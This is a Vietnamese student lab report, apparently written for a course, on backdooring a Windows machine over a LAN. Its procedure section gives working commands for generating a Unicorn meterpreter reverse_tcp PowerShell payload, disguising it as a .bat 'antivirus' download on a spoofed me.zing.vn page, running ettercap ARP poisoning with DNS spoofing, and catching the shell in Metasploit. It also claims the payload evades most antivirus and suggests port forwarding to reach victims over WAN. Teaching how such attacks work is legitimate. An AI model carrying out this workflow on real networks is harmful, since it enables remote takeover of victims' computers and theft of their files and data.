BÁO CÁO LAB ATTACK MỞ BACKDOOR

THÂM NHẬP MÁY TÍNH

I. TỔNG QUAN
Backdoor (cửa hậu) trong phần mềm hay hệ thống máy tính thường là một
cổng không được thông báo rộng rãi, cho phép người quản trị xâm nhập hệ
thống để tìm nguyên nhân gây lỗi hoặc bảo dưỡng. Ngoài ra nó cũng dùng
để chỉ cổng bí mật mà hacker và gián điệp dùng để truy cập bất hợp pháp.
Có nhiều cách để mở backdoor trên máy tính nạn nhân, ở bài viết này
chúng ta sử dụng công cụ “Magic Unicorn”, kết hợp với kỹ thuật tấn công
“Man-In-The-Middle” để hỗ trợ chạy đoạn mã powershell trên máy tính
nạn nhân.
- Magic Unicorn là một công cụ được phát triển bởi TrustedSec dùng
để tấn công PowerShell của Windows và tiêm shellcode thẳng vào
bộ nhớ. Công cụ được phát triển dựa trên kỹ thuật tấn công
PowerShell của Matthew Graeber, kỹ thuật bypass (vượt qua) bảo
mật của PowerShell của David Kennedy (TrustedSec) và Josh Kelly
đưa ra tại hội nghị Defcon 18. Cách sử dụng rất đơn giản, chỉ cần
chạy Magic Unicorn (đảm bảo rằng Metasploit đã được cài đặt) và
Magic Unicorn sẽ tự động tạo ra lệnh PowerShell sau đó chỉ cần tìm
cách chạy được đoạn mã này trên máy tính mục tiêu.

- Man in the Middle là một trong những kiểu tấn công mạng thường
thấy nhất được sử dụng để chống lại những cá nhân và các tổ chức
lớn chính, nó thường được viết tắt là MITM. Có thể hiểu nôm na
rằng MITM giống như một kẻ nghe trộm. MITM hoạt động bằng
cách thiết lập các kết nối đến máy tính nạn nhân và chuyển tiếp dữ
liệu giữa chúng. Trong trường hợp bị tấn công, nạn nhân cứ tin
tưởng là họ đang truyền thông một cách trực tiếp với nạn nhân kia,
nhưng sự thực thì các luồng truyền thông lại bị thông qua host của
kẻ tấn công. Và kết quả là các host này không chỉ có thể thông dịch
dữ liệu nhạy cảm mà nó còn có thể gửi xen vào cũng như thay đổi
luồng dữ liệu để kiểm soát sâu hơn những nạn nhân của nó. Cụ thể ở
đây chúng ta sử dụng hình thức tấn công “DNS Spoofing” và “ARP
Cache Poisoning”.

II. GIỚI THIỆU KỸ THUẬT ARP Cache Poisoning:

Đây là một hình thức tấn công MITM hiện đại có xuất xứ lâu đời nhất (đôi
khi còn được biết đến với cái tên ARP Poison Routing), tấn công này cho
phép hacker (nằm trên cùng một subnet với các nạn nhân của nó) có thể
nghe trộm tất cả các lưu lượng mạng giữa các máy tính nạn nhân.
Giao thức ARP được thiết kế để phục vụ cho nhu cầu thông dịch các địa
chỉ giữa các lớp thứ hai và thứ ba trong mô hình OSI. Lớp thứ hai (lớp
data-link) sử dụng địa chỉ MAC để các thiết bị phần cứng có thể truyền
thông với nhau một cách trực tiếp. Lớp thứ ba (lớp mạng), sử dụng địa chỉ
IP để tạo các mạng có khả năng mở rộng trên toàn cầu. Lớp data-link xử lý
trực tiếp với các thiết bị được kết nối với nhau, còn lớp mạng xử lý các
thiết bị được kết nối trực tiếp và không trực tiếp. Mỗi lớp có cơ chế phân
định địa chỉ riêng, và chúng phải làm việc với nhau để tạo nên một mạng
truyền thông. Với lý do đó, ARP được tạo với RFC 826, “một giao thức
phân định địa chỉ Ethernet - Ethernet Address Resolution Protocol”.
Thực chất trong vấn đề hoạt động của ARP được tập trung vào hai gói,
một gói ARP request và một gói ARP reply. Mục đích của request và reply
là tìm ra địa chỉ MAC phần cứng có liên quan tới địa chỉ IP đã cho để lưu
lượng có thể đến được đích của nó trong mạng. Gói request được gửi đến
các thiết bị trong đoạn mạng, trong khi gửi nó nói rằng (đây chỉ là nhân
cách hóa để giải thích theo hướng dễ hiểu nhất) “Hey, địa chỉ IP của tôi là
XX.XX.XX.XX, địa chỉ MAC của tôi là XX:XX:XX:XX:XX:XX. Tôi cần gửi
một vài thứ đến một người có địa chỉ XX.XX.XX.XX, nhưng tôi không biết
địa chỉ phần cứng này nằm ở đâu trong đoạn mạng của mình. Nếu ai đó
có địa chỉ IP này, xin hãy đáp trả lại kèm với địa chỉ MAC của mình!” Đáp
trả sẽ được gửi đi trong gói ARP reply và cung cấp câu trả lời, “Hey thiết
bị phát. Tôi là người mà bạn đang tìm kiếm với địa chỉ IP là
XX.XX.XX.XX. Địa chỉ MAC của tôi là XX:XX:XX:XX:XX:XX.” Khi quá
trình này hoàn tất, thiết bị phát sẽ cập nhật bảng ARP cache của nó và hai
thiết bị này có thể truyền thông với nhau.
Việc giả mạo bảng ARP chính là lợi dụng bản tính không an toàn của giao
thức ARP. Không giống như các giao thức khác, chẳng hạn như DNS (có
thể được cấu hình để chỉ chấp nhận các nâng cấp động khá an toàn), các
thiết bị sử dụng giao thức phân giải địa chỉ (ARP) sẽ chấp nhận nâng cấp
bất cứ lúc nào. Điều này có nghĩa rằng bất cứ thiết bị nào có thể gửi gói
ARP reply đến một máy tính khác và máy tính này sẽ cập nhật vào bảng
ARP cache của nó ngay giá trị mới này. Việc gửi một gói ARP reply khi
không có request nào được tạo ra được gọi là việc gửi ARP “vu vơ”. Khi
các ARP reply vu vơ này đến được các máy tính đã gửi request, máy tính
request này sẽ nghĩ rằng đó chính là đối tượng mình đang tìm kiếm để
truyền thông, tuy nhiên thực chất họ lại đang truyền thông với một kẻ tấn
công.
III. GIỚI THIỆU KỸ THUẬT DNS SPOOFING
Giả mạo DNS(DNS Spoofing) là một kỹ thuật MITM được sử dụng nhằm
cung cấp thông tin DNS sai cho một host để khi người dùng duyệt đến một
địa chỉ nào đó, ví dụ “www.me.zing.vn” có IP “XXX.XX.XX.XX” thì cố gắng
này sẽ được gửi đến một địa chỉ “www.me.zing.vn” giả mạo cư trú ở địa chỉ
IP “YYY.YY.YY.YY” đây là địa chỉ web mà kẻ tấn công đã tạo ra nhầm lừa
người dùng tải file mã độc về máy.
Có nhiều cách để có thể thực hiện vấn đề giả mạo DNS. Ở đây nhóm sẽ sử
dụng một kỹ thuật mang tên giả mạo DNS ID.
Mỗi truy vấn DNS được gửi qua mạng đều có chứa một số nhận dạng duy
nhất, mục đích của số nhận dạng này là để phân biệt các truy vấn và đáp trả
chúng. Điều này có nghĩa rằng nếu một máy tính đang tấn công của chúng ta
có thể chặn một truy vấn DNS nào đó được gửi đi từ một thiết bị cụ thể, thì tất
cả những gì chúng ta cần thực hiện là tạo một gói giả mạo có chứa số nhận
dạng đó để gói dữ liệu đó được chấp nhận bởi mục tiêu.
Chúng ta sẽ hoàn tất quá trình này bằng cách thực hiện hai bước với một công
cụ đơn giản. Đầu tiên, chúng ta cần giả mạo ARP cache thiết bị mục tiêu để
 định tuyến lại lưu lượng của nó qua host đang tấn công của mình, từ đó có thể
chặn yêu cầu DNS và gửi đi gói dữ liệu giả mạo. Mục đích của kịch bản này
là lừa người dùng trong mạng mục tiêu truy cập vào website độc thay vì
website mà họ đang cố gắng truy cập. Để rõ hơn bạn có thể tham khảo thêm
hình tấn công bên dưới:

IV. THỰC HIỆN TẤN CÔNG

Để thực hiện tấn công chúng ta cần có các công cụ sau:
 Ettercap.
 Metasploit.
 Unicorn.
Ở đây nhóm sử dụng hệ điều hành kali linux nên công cụ Ettercap và
Metasploit đã được cài sẵn trong gói cài đặt hệ điều hành.
Để có công cụ Unicorn chúng ta thực hiện lên “git clone
https://github.com/trustedsec/unicorn.git”
Trước hết chúng ta phải xác định IP của mình và IP của nạn nhận. Có thể
sử dụng các công cụ để quét IP trong mạng. Giả sử ở đây chúng ta có IP
của nạn nhân là “192.168.5.104” và IP của người tấn công là
“192.168.5.100”.
Bước 1: Tiến hành cấu hình file “etter.dns” cho Ettercap theo đường dẫn
trên kali
“Etc\ettercap\etter.dns”

3 dòng trong khung màu xanh chỉnh sửa lại thành tên miền mà chúng ta
muốn giả mạo khi nạn nhân truy cập tên miền đó sẻ được trỏ về máy chủ
web có địa chỉ IP trong khung màu đỏ.
Bước 2: Giả mạo một trang web đánh lừa người dùng trong bài lab này
chúng ta chỉnh sửa trang index trong dịch vụ web của kali trong đường dẫn
“var/www/html/index.html”
Ở đây giả sử ta giả mạo khi người dùng truy cập trang web “me.zing.vn”
sẻ hiển thị nội dung rằng máy của họ đã bị nhiểm mã độc phải tải file diệt
virus về máy. Có giao diện như sau:
Để tăng tính hiệu quả chúng ta có thể đầu tư phần giao diện sao cho dễ đánh
lừa người dùng nhất có thể.
Bước 3: Thực hiện tạo malware bằng công cụ Unicorn đã clone về từ github
lúc đầu.
Di chuyển vào thư mục của Unicorn lúc tải về. Ở đây nhóm để ở Desktop.
Chạy lên như sau:
“ cd Desktop/unicorn
Python unicorn.py”

Sau đó thực hiện lệnh:

“python unicorn.py windows/meterpreter/reverse_tcp 192.168.5.100 443”
192.168.5.100 là địa chỉ IP của máy thực hiện tấn công.
443 Là port chỉ định khi malware thực hiện kết nối ngược về thông qua port 443.

Sau khi thực hiện lệnh trên kiểm tra trong thư mục của unicorn sẽ thấy có
2 tệp mới được tạo ra “powershell_attack.txt” và “unicorn.rc”.
Tiến hành đổi tên file powershell_attack.txt thành tên file có đuôi .bat ví
dụ “attack.bat”. Đính file này vào phần dowload của web chúng ta đã tạo
lúc đầu.
Bước 4: Khởi động dịch vụ web sever của kali lên bằng lệnh
“service apache2 start”
Để kiểm tra xem dịch vụ đã được khởi động thành công chưa chúng
ta thực hiện truy cập bằng browser trực tiếp đến IP của dịch vụ web sever
trên kali.

Bước 5: Sử dụng ettercap để thực hiện ARP Cache Poisoning và DNS

SPOOFING
Khởi chạy chuỗi lệnh:
“ettercap -T -q -M arp:remote -P dns_spoof -i eth0 //192.168.5.104//”
192.168.5.104 là địa chỉ IP của máy nạn nhân.

Sau khi thực hiện câu lệnh quá trình tấn công sẻ có 2 giai đoạn:
 - Giai đoạn 1 giả mạo ARP cache của thiết bị trên mạng.
- Giai đoạn 2 phát các đáp trả truy vấn DNS giả mạo.
Lưu ý: phải làm sạch DNS cache của máy nạn nhân trước có thể sử dụng
các công cụ như CutNet hoặc các kỹ thuật khác. Trong phạm vi bài lab có
hạn nên ở đây chúng ta tiến hành chạy lệnh “ipconfig /flushdns” để chủ
động làm sạch DNS cache của máy nạn nhân.

Bước 6: Khởi động Metasploit để chờ khi mở backdoor thành công ta có

thể tiến hành thực hiện các lệnh powershell khác.
Di chuyển đến thư mục chứa file “unicorn.rc”
“cd Desktop/unicorn
Msfconsole -r unicorn.rc”

Đợi đến khi nạn nhân tải về và chạy file .bat là chúng ta mở backdoor
thành công.
 Khi nạn nhân chạy file .bat chúng ta sẻ thấy trong console có dòng như
trên có nghĩa là backdoor đã được mở.
Chạy lệnh “ Sesions -i 1” để bắt đầu phiên kết nối.
Ví dụ cơ bản chúng ta có thể thử xem thông tin về máy nạn nhận bằng
lệnh “sysinfo”

Thông tin của máy nạn nhân được trả về.

Qua backdoor này chúng ta có thể thực hiện nhiều việc như ăn cấp thông
tin, đánh cấp file, cài thêm các mã độc khác vào máy nạn nhân…..

V. TỔNG KẾT
Bằng việc sử dụng công cụ Unicorn malware được tạo ra có thể vượt qua
được hầu hết các tường lửa và trình duyệt virus ở thời điểm thực hiện bài
lab này. Công cụ Unicorn còn có thể tấn công bằng nhiều phương thức
khác nhau như reverse_https tấn công macro đính kèm powershell vào tệp
word hay excel...Kết hợp với metasploit và ettercap để thực hiện các tấn
cực kỳ hiệu quả.
Báo cáo có tham khảo thông tin từ website Quantrimang.com và một số
video trên youtube. Hiện bài lab chỉ thực hiện trên mạng LAN để có thể
thực hiện trên mạng WAN chúng ta có thể tìm hiểu kỹ thuật Port
Forwarding.
Cảm ơn thầy và các bạn!